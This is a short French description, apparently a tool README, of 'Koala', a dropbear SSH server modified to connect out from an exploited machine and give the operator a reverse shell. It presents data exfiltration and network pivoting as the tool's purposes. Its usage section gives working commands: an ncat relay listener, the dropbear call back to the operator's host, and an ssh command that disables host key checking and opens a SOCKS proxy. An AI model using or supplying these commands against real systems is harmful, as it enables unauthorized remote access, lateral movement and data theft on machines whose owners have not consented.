
Serveur dropbear modifié qui agit comme un client et permet une connexion sans authentification
Koala est une version patchée du serveur SSH dropbear qui, au lieu de se lier à un port, ouvre des shells inversés en se connectant à un client distant.
Cela est utile pour obtenir un terminal pty sur une machine exploitée et aussi pour l'exfiltration sécurisée de données via le transfert de port SSH. Le pivotement peut également être effectué en utilisant la fonctionnalité de transfert de port SSH dynamique.
[Utilisation]
Exécutez la commande suivante sur le client pour écouter la connexion SSH : $ ncat -lvp 5000 --sh-exec 'ncat -lvp 9999'
Sur la machine exploitée, exécutez : $ ./dropbear -p client-host:5000
Maintenant, sur le client, connectez-vous au port 9999 pour ouvrir un shell : $ ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null localhost -D9050 -p9999